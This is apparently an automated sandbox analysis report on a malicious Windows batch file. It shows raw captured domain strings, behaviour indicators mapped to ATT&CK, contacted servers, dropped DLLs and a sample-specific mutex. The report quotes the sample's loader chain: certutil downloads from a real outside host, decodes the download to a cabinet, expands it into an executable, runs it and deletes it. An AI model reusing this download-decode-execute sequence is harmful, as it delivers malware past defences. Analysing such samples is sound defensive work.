".comafy11.netnytimes.comwww.huffingtonpost.esm.one.impact-ad.jpwww.expedia.comfsdn.comweborama.comstatse.webtrendslive.comwww.gov.uksmartadserver.comsony.jpautoitscript.comwww.kayak.esyoo7.comwww.miniclip.comadtech.dewww.zhcw.commediav.commtvnservices.comadhood.comwww.next.co.ukweb.defr.ebayrtm.comrum-dytrc.corriere.itintentmedia.netcount.pcauto.com.cnsanspo.comojogos.com.brmarktplaats.nltrtstats.topix.comtap2-cdn.rubiconproject.comyelp.comijinshan.comsddan.comhit.stat24.comq1.comsympatico.cawww.metacafe.comeonline.comoptimahub.comtiara.daum.netamericanairlines.esonlinedown.netwww.netshoes.com.brp.smartertravel.comwp.plkeyade.comgammaplatform.comleboncoin.fradsnative.comgo.comwww.goo.ne.jphubspot.netrevelist.commaxpark.comtrvl-px.comamazon.fremxdgt.comwww.chinaz.comzedo.comjs.spotx.tvojrq.netwww.haodf.comtypepad.comaltergeo.rusiteeuwest.slgnt.eumaktoob.comtheadex.comad8.adfarm1.adition.combumlam.comwww.att.comdailymotion.comblackberry.comaddthis.comamazon.comatdmt.comadsupplyssl.commercadoclics.comdyntrk.commozilla.orgsears.comcdnze.com3839.comwww.webmd.com2103950122.log.optimizely.comyahoo.com.twnative.aipbskids.orgliveinternet.ruwww.twoo.comthrough.auction.co.krdouban.commail.ru360daily.comwww.bing.comaccounts.google.comgoo.ne.jpwww.easyjet.c'lG[_[" (Indicator: "blackberry.com"; File: "network.pcap"), 
"netmatome.naver.jpwww.viamichelin.frwww.nextinsure.comapxlv.combild.dewww.tamgrt.com01net.comwww.liveadexchanger.comitau.com.brvancl.comom.elvenar.comwww.nifty.comt.fstrk.netsociomantic.comwww.toysrus.comservices.borderfree.comcarambo.laemail-reflex.comrentalcars.comnordstromimage.comwizard101.comziddu.comwww.xfinity.comgateway.foresee.comnetwork.bazaarvoice.comkp.rubitauto.comjd.comwww.excite.co.jpkdcl.pchome.com.twsync.company-target.comadlabs.ruclassmates.comsonymobcomm.tt.omtrdc.netsfr.frsync.shinobi.jpads.webkinz.comsbal4kp.comfixya.comsanook.comhls.dianping.comwww.gamezer.comomtrdc.netads.publicidad.netmyhard.com5ch.netwww.verizonwireless.comuniversal.iperceptions.comglassgret.comadserver01.deds1.digitalaudienz.comimvu.com200632758.log.optimizely.comgentags.netbuscape.com.bretao.combabylon.comallocine.frskype.comfunmoods.comprimecaster.netwww.ugdturner.comluxup.rucrsspxl.comtripadvisor.comit.altervista.orgmedia6degrees.comsxp.smartclip.netsouthwest.comstat.media621373388.log.optimizely.comnickjr.esnexage.comtinypic.comwww.peopleewnetwork.comautoscout24.deadvanseads.comwww.last.fmwn.comwww.t-online.deusi-saas.vnexpress.netads.linkedin.comtechnical-service.netspringserve.comwww.zoosk.comonet.tvyahoo.techads.infozhcw.comnba.hupu.comwww.hugedomains.comlivi'lG[" (Indicator: "skype.com"; File: "network.pcap"), 
"1.microsoft.comsky.comargos.co.ukmixi.jpimmobilienscout24.desoundcloud.comzynga.comnokia.comscanscout.comwww.stumbleupon.comteads.tvitaliaonline01.wt-eu02.netipinyou.comprf.hnwww.united.compublicidad.netsecureaud.solocpm.compopwal.itmyvisualiq.nettt-11106-6.seg.t.tailtarget.comv.6.cns.thebrighttag.comwordpress.comwww.travelocity.comflipboard.comsahcdn.comconnatix.comopendns.comvagalume.com.brliutilities.comc1exchange.coming.nlpclady.com.cnmatch.rundsp.comadmatrix.jpdeployads.comtorrentz.eugoogle.comwww.goal.comt.brand-server.comblogger.comglobal.nickjr.tvcollector-282.tvsquared.comr7.comcounter.scribblelive.comwww.webex.commlb.comseznam.czhotwire.comkameleoon.eufriend.ly96pk.commarca.comrp.liadm.comperfectmarket.combedbathandbeyond.comes.ign.comcom-lenovo.netmng.comwww.sony.compconline.com.cnplacelocal.comorange.demdex.netsohu.comstumbleupon.compxuno.combarclays.co.ukibm.comwunderground.comkidsafeseal.comyjtag.yahoo.co.jprutarget.ruwww.gumtree.comes.yahoo.comgemius.plcheapoair.comtt-10162-1.seg.t.tailtarget.comwww.shopathome.comit.ebayrtm.comverizon.comnaver.jptarget.compingdom.netwetter.comabtasty.comretailmenot.comdatamind.ruameba.jptelegraph.co.ukevents.ocdn.euem.nscontext.euwww.topix.combetsonsport.rutanx.comwww.zillow.comt-mobile.com17173.coms'lG[B]" (Indicator: "wire.com"; File: "network.pcap"), 
"unrulymedia.comcdn.viglink.comwww.lowes.comrec.udn.commarchex.iojxedt.combidswitch.netkeisu02.eproof.comsmartbmc.com.brat.atwola.cominner-active.mobikakao.comwebcollect.kugou.comspeedtest.netdrugs.comxunlei.comidntfy.runordstrom.comimpact-ad.jptribalfusion.comtinypass.comcomcast.inq.coml.qq.comaltervista.orgadtrue.combooking.comadbrn.comb.wishabi.comwww.teamviewer.comwcfbc.netokwave.jpwww.freeonlinegames.comwww.enfemenino.comoyunlar1.comxinhuanet.comsend.microadinc.combuycheapr.comintuit.cominnovid.commeishichina.comfoxnews.compch.comnicovideo.jpg.eclick.vnwww.bb.com.bradvg.jpmoshimonsters.compxtres.comwww.careerbuilder.comfilefreak.comdistrictm.ioolx.com.brsimpli.fiwww.geniuskitchen.comm.reachmax.cndragonfable.comwww.merriam-webster.commediatoday.rupoptropica.comkaixin001.comwww.asahi.comnifty.comdatadbs.comgoal.comorange.frwww.today.combankofamerica.comwebkinznewz.ganzworld.comirs01.comcpx.towww.homedepot.comi.liadm.commedia.netoverstock.comyldbt.comcm.adsafety.netmobile.deamazon.co.ukoi.com.bri-mobile.co.jp3lift.comdxpmedia.com766.comwww.fifa.comtacdn.comindeed.esalot.compchome.com.twhome.bt.comwushen.comtmz.comwww.so-net.ne.jpwww.mcmprod.hsbc.co.ukwww.y8.comit168.comztgame.comicq.comati-host.netturner.comwww.cafemom.comtheweathernetwork'lG[L]" (Indicator: "icq.com"; File: "network.pcap"), 
"adtechus.comqip.rumylife.comtechads.infomapquest.comsakura.ne.jpmynet.comwww.yahoo.comju.taobao.compaypal.comesmas.comking.combetweendigital.comtopix.comseesaa.jpmy.rtmark.netd2-apps.netscribblelive.comcox.comneural10.cdnwebcloud.commonografias.comwww.staples.comsamsclub.comsp.gmossp-sp.jpsmi2.netwww.oracle.comadsymptotic.comsocial.playstation.comgowatchfreemovies.tofreeskreen.comudn.comyieldlab.netjiayuan.comt.apontador.com.brnuggad.netboldchat.comgsspat.jpj.mrpdata.netkakaku.comwidespace.comttlbd.nettumblr.comxbox.comd.adroll.commilliyet.com.trbreak.comper.auction.co.krcardlytics.comstaples.comamazon-adsystem.comm6r.euoredero.comru4.comapontador.com.brsitescout.comec.hub2.com.plshoplocal.commtv.commsn.comnetlog.comgssprt.jpwww.aipai.comrecruit.112.2o7.netperimeterx.netplaystation.comcnet.comsecure.calcch.comtidaltv.comxg4ken.comabmr.netd-test.39.netyandex.rugry.plcartoonnetwork.esmacys.comtracead.comhlserve.comups.xplosion.dematrixspa.itsxy.hc360.comtynt.commpsnare.iesnare.comsdp-campaign.derareru.rucncn.comrmntpjs.comand.co.uksina.com.cnlightboxcdn.comenfemenino.commm.markandmini.comgo.flx1.comeasyjet.commember.auction.co.kravg.comc.appier.netstatic-chomikuj.pltheguardian.comintel.eswebspectator.comcbslocal.comgwallet.comviamichelin.'lG[
_" (Indicator: "qip.ru"; File: "network.pcap")
- source: File/Memory
- relevance: 10/10
- note: the matches (qip.ru, skype.com, icq.com, wire.com, blackberry.com) come from browser cookie rows and a domain list carried inside the captured traffic, not from connections to those domains; the only hosts contacted are the three listed under "Contacts domains" below.
System Destruction
-
Marks file for deletion
- details
-
"%WINDIR%\SysWOW64\certutil.exe" marked "%WINDIR%\cerB423.tmp" for deletion
"%WINDIR%\SysWOW64\certutil.exe" marked "%WINDIR%\cerD4CA.tmp" for deletion
"%WINDIR%\SysWOW64\expand.exe" marked "%TEMP%\$dpx$.tmp" for deletion
"%TEMP%\ercg345c24.exe" marked "%TEMP%\2074536799844245989641.tmp-shm" for deletion
"%TEMP%\ercg345c24.exe" marked "%TEMP%\2074536799844245989641.tmp-wal" for deletion
"%TEMP%\ercg345c24.exe" marked "%TEMP%\2074536799844245989641.tmp" for deletion - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1107 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens file with deletion access rights
- details
-
"certutil.exe" opened "%WINDIR%\cerB423.tmp" with delete access
"certutil.exe" opened "%WINDIR%\cerD4CA.tmp" with delete access
"expand.exe" opened "%TEMP%\$dpx$.tmp\218f98763775034fb6c9e84dafefab70.tmp" with delete access
"expand.exe" opened "%TEMP%\$dpx$.tmp" with delete access
"ercg345c24.exe" opened "%TEMP%\2074536799844245989641.tmp-shm" with delete access
"ercg345c24.exe" opened "%TEMP%\2074536799844245989641.tmp-wal" with delete access
"ercg345c24.exe" opened "%TEMP%\2074536799844245989641.tmp" with delete access - source
- API Call
- relevance
- 7/10
-
Marks file for deletion

System Security

Modifies proxy settings
- details:
  - "certutil.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
  - "certutil.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
  - "certutil.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
  - "certutil.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "certutil.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112
- note: all of these writes are made by certutil.exe itself while fetching the URL; nothing in the report shows the dropped payload touching proxy settings.

Queries sensitive IE security settings
- details: "certutil.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source: Registry Access
- relevance: 8/10
- ATT&CK ID: T1012
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"cmd.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"certutil.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"certutil.exe" wrote bytes "c0df43771cf94277ccf842770d64447700000000c0118d7600000000fc3e8d7600000000e0138d76000000009457b47525e04377c6e0437700000000bc6ab37500000000cf318d76000000009319b475000000002c328d7600000000" to virtual address "0x75A71000" (part of module "NSI.DLL")
"certutil.exe" wrote bytes "7d07477781ed4577ae864477c6e04377effd46772d16457760144777478d4477a8e243776089447700000000ad37f3768b2df376b641f37600000000" to virtual address "0x71F81000" (part of module "WSHTCPIP.DLL")
"certutil.exe" wrote bytes "0efc467781ed4577ae864477c6e04377effd46772d164577c0fc4277da8f4d7760144777478d4477a8e243776089447700000000ad37f3768b2df376b641f37600000000" to virtual address "0x71F71000" (part of module "WSHIP6.DLL")
"expand.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"ercg345c24.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"ercg345c24.exe" wrote bytes "7d07477781ed4577ae864477c6e04377effd46772d16457760144777478d4477a8e243776089447700000000ad37f3768b2df376b641f37600000000" to virtual address "0x73941000" (part of module "WSHTCPIP.DLL")
"ercg345c24.exe" wrote bytes "c0df43771cf94277ccf842770d64447700000000c0118d7600000000fc3e8d7600000000e0138d76000000009457b47525e04377c6e0437700000000bc6ab37500000000cf318d76000000009319b475000000002c328d7600000000" to virtual address "0x75A71000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
-
"certutil.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"expand.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
-
1 suspicious indicator is not shown in this report.

Informative (26)

Anti-Reverse Engineering

Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details:
  - SetUnhandledExceptionFilter@KERNEL32.DLL from ercg345c24.exe (PID: 3852) (4 occurrences)
  - SetUnhandledExceptionFilter@KERNEL32.DLL from sort.exe (PID: 2260) (4 occurrences)
  - SetUnhandledExceptionFilter@KERNEL32.dll (2 occurrences)
- source: Hybrid Analysis Technology
- relevance: 1/10
- note: SetUnhandledExceptionFilter (and the GetSystemTimeAsFileTime import below) are emitted by the MSVC CRT startup code in nearly every compiled Windows binary; the 1/10 relevance reflects that.

Environment Awareness

Contains ability to query machine time
- details:
  - GetSystemTimeAsFileTime@KERNEL32.DLL from ercg345c24.exe (PID: 3852)
  - GetSystemTimeAsFileTime@KERNEL32.DLL from sort.exe (PID: 2260)
  - GetLocalTime@api-ms-win-core-sysinfo-l1-1-0.dll (5 occurrences)
- source: Hybrid Analysis Technology
- relevance: 1/10
- ATT&CK ID: T1124

Contains ability to query the machine timezone
- details: GetTimeZoneInformation@api-ms-win-core-timezone-l1-1-0.dll (2 occurrences)
- source: Hybrid Analysis Technology
- relevance: 1/10
- ATT&CK ID: T1124

Contains ability to query volume size
- details: GetDiskFreeSpaceW@api-ms-win-core-file-l1-1-0.dll
- source: Hybrid Analysis Technology
- relevance: 3/10
- ATT&CK ID: T1083

Possibly tries to detect the presence of a debugger
- details:
  - GetProcessHeap@KERNEL32.DLL from ercg345c24.exe (PID: 3852)
  - GetProcessHeap@KERNEL32.DLL from sort.exe (PID: 2260)
- source: Hybrid Analysis Technology
- relevance: 1/10
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)" (SID: 2015744, Rev: 4, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert

General

Contacts domains
- details:
  - "www.illumania.net"
  - "login.giocherialaragnatela.it"
  - "www.webproj.com.br"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details:
  - "70.40.203.216:80"
  - "93.170.105.132:80"
  - "177.185.194.174:80"
- source: Network Traffic
- relevance: 1/10

Contains PDB pathways
- details:
  - "api-ms-win-core-memory-l1-1-0.pdb"
  - "api-ms-win-crt-utility-l1-1-0.pdb"
  - "api-ms-win-crt-process-l1-1-0.pdb"
  - "api-ms-win-core-datetime-l1-1-0.pdb"
  - "api-ms-win-crt-stdio-l1-1-0.pdb"
  - "api-ms-win-core-synch-l1-2-0.pdb"
  - "api-ms-win-crt-heap-l1-1-0.pdb"
- source: File/Memory
- relevance: 1/10

Creates a writable file in a temporary directory
- details:
  - "certutil.exe" created file "%TEMP%\ercg345c24.txt"
  - "certutil.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\ercg345c24.cab"
  - "expand.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\$dpx$.tmp\218f98763775034fb6c9e84dafefab70.tmp"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-console-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-datetime-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-debug-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-errorhandling-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-file-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-file-l1-2-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-file-l2-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-handle-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-heap-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-interlocked-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-libraryloader-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-localization-l1-2-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-memory-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-namedpipe-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-processenvironment-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-processthreads-l1-1-0.dll"
  - "ercg345c24.exe" created file "C:\Users\%USERNAME%\AppData\Local\Temp\1Mo\api-ms-win-core-processthreads-l1-1-1.dll"
- source: API Call
- relevance: 1/10

Creates mutants
- details:
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  - "Local\ZonesLockedCacheCounterMutex"
  - "Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Global\WdsSetupLogInit"
  - "\Sessions\1\BaseNamedObjects\Global\SetupLog"
  - "Global\WdsSetupLogInit"
  - "Global\SetupLog"
  - "\Sessions\1\BaseNamedObjects\A4vds98f74sdvc89svwd"
- note: the Zones*CacheCounterMutex and *SetupLog* names belong to Windows components (the WinINet/urlmon zone cache and the setup log) used by certutil and expand; "A4vds98f74sdvc89svwd" is the only name specific to the sample and the one worth using as a host indicator.
"A4vds98f74sdvc89svwd" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
-
Antivirus vendors marked dropped file "api-ms-win-crt-utility-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-util-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-crt-environment-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-file-l1-2-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-libraryloader-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-crt-stdio-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-crt-multibyte-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-processthreads-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-processenvironment-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "msvcp140.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-processthreads-l1-1-1.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-debug-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-file-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "freebl3.dll" as clean (type is "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-crt-convert-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-timezone-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-synch-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-sysinfo-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-crt-time-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
Antivirus vendors marked dropped file "api-ms-win-core-handle-l1-1-0.dll" as clean (type is "PE32 executable (DLL) (console) Intel 80386 for MS Windows")
- source
- Binary File
- relevance
- 10/10
-
Process launched with changed environment
- details
-
Process "certutil.exe" was launched with new environment variables: "fbbvwqvhor="j", fpudnqibnn="c", dbgbhthiwe="n", nbdatjlxaa="s", rpmxpeaqkv="a", bclhrvsier="r", llcyalatin="k", hbwpmojhge="f", oxiplhifxh="e", wjdubatqvb="w", fzcnzqdich="u", ttpkycaxri="m", ispgaooask="d", qgktngrldo="s", lncgxlstvy="p", dnntqtunxj="e", dszrusmbik="l", rovaofbyaa="o", ycqnbxejme="v", psrlwgeret="t", ztjdpwjdxk="t", karjcmygzr="b", wcvtlzqjtr="z", vwtxgbzdzu="y", pnsucgurfy="h", fijxmryoqb="g", dvzarsebuu="i", gomsrppuky="x", pbldtghmet="q""
Process "cmd.exe" was launched with modified environment variables: "Path" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "/c timeout 4 & del "ercg345c24.exe"" on 2018-7-12.16:58:44.765
- source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php ..."
Spawned process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab"
Spawned process "expand.exe" with commandline "expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe"
Spawned process "ercg345c24.exe"
Spawned process "sort.exe"
Spawned process "cmd.exe" with commandline "/c timeout 4 & del "ercg345c24.exe"" - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php ..."
Spawned process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab"
Spawned process "expand.exe" with commandline "expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe"
Spawned process "ercg345c24.exe"
Spawned process "sort.exe"
Spawned process "cmd.exe" with commandline "/c timeout 4 & del "ercg345c24.exe"" - source
- Monitored Target
- relevance
- 3/10
-
Installation/Persistance
-
Connects to LPC ports
- details
-
"certutil.exe" connecting to "\ThemeApiPort"
"ercg345c24.exe" connecting to "\ThemeApiPort" - source
- API Call
- relevance
- 1/10
-
Creates new processes
- details
-
"cmd.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\certutil.exe", Handle: 128)
"cmd.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\certutil.exe", Handle: 120)
"cmd.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\expand.exe", Handle: 120)
"cmd.exe" is creating a new process (Name: "%TEMP%\ercg345c24.exe", Handle: 124) - source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"api-ms-win-core-synch-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-datetime-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"sort.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"api-ms-win-core-memory-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"vcruntime140.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"ucrtbase.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-heap-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-process-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"nss3.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"api-ms-win-crt-conio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"mozglue.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"api-ms-win-crt-math-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-utility-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-util-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-environment-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-file-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-libraryloader-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-stdio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-multibyte-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-processthreads-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "cmd.exe" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"certutil.exe" touched file "C:\Windows\SysWOW64\en-US\certutil.exe.mui"
"certutil.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"certutil.exe" touched file "C:\Windows\cerB423.tmp"
"certutil.exe" touched file "C:\Windows\SysWOW64\en-US\KernelBase.dll.mui"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\counters.dat"
"certutil.exe" touched file "C:\Windows\SysWOW64\rsaenh.dll"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History"
"certutil.exe" touched file "C:\Windows\SysWOW64\wshqos.dll"
"certutil.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CP53U0VR\login[1].htm"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\CP53U0VR\login[1].htm"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\counters.dat"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files"
"certutil.exe" touched file "%APPDATA%\Microsoft\Windows\Cookies"
"certutil.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\History" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
- source
- File/Memory
- relevance
- 10/10
-
System Security
-
Creates or modifies windows services
- details
-
"certutil.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
"ercg345c24.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"certutil.exe" opened "\Device\KsecDD"
"expand.exe" opened "\Device\KsecDD"
"ercg345c24.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215
-
Unusual Characteristics
-
Drops cabinet archive files
- details
- "ercg345c24.cab" has type "Microsoft Cabinet archive data 138377 bytes 1 file"
- source
- Binary File
- relevance
- 10/10
-
Uses certutil from the Windows Certificate Services
- details
-
Process "certutil.exe"
Process "certutil.exe" - source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1140
File Details
VT6784985745.bat
- Filename
- VT6784985745.bat
- Size
- 47KiB (48517 bytes)
- Type
- script bat
- Description
